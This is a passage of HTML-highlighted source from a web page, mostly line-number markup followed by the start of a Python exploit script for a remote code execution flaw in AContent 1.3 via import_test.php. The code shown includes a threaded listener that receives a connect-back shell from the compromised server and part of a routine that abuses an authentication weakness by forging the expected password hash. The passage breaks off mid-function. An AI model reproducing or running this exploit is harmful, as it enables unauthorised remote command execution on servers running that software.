class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-591b7aecb0fac853799589-239\">239<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-591b7aecb0fac853799589-240\">240<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-1\"><span class=\"crayon-p\">#!\/usr\/local\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">time<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">select<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-t\">string<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">random<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">zipfile<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">termios<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hashlib<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-13\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-14\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">threading<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-15\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">SocketServer<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-16\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">cStringIO <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">StringIO<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-18\"><span class=\"crayon-p\"># interactive connectback listener<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-19\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connect_back_shell<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">BaseRequestHandler<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-21\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;our interactive, shell like client<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-22\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">handle<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-25\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcgetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">select<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">select<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fileno<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;exit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">or<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;quit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">KeyboardInterrupt<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">finally<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tcsetattr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">termios<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCSADRAIN<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">old_settings<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-43\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">terminate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">close<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">self<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">shutdown<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-48\"><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">threaded_tcp_server<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ThreadingMixIn<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SocketServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCPServer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-51\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">banner<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nt| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- |&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t| AContent &lt;= 1.3 import_test.php Remote Code Execution Vulnerability |&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;t| &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|n&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-55\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-56\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_get_hashed_password<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-58\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;takes advantage of the authentication weakness and generates <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-59\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;the hash as the server expects it, see client side code<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-60\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-591b7aecb0fac853799589-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sha1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-591b7aecb0fac853799589-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span 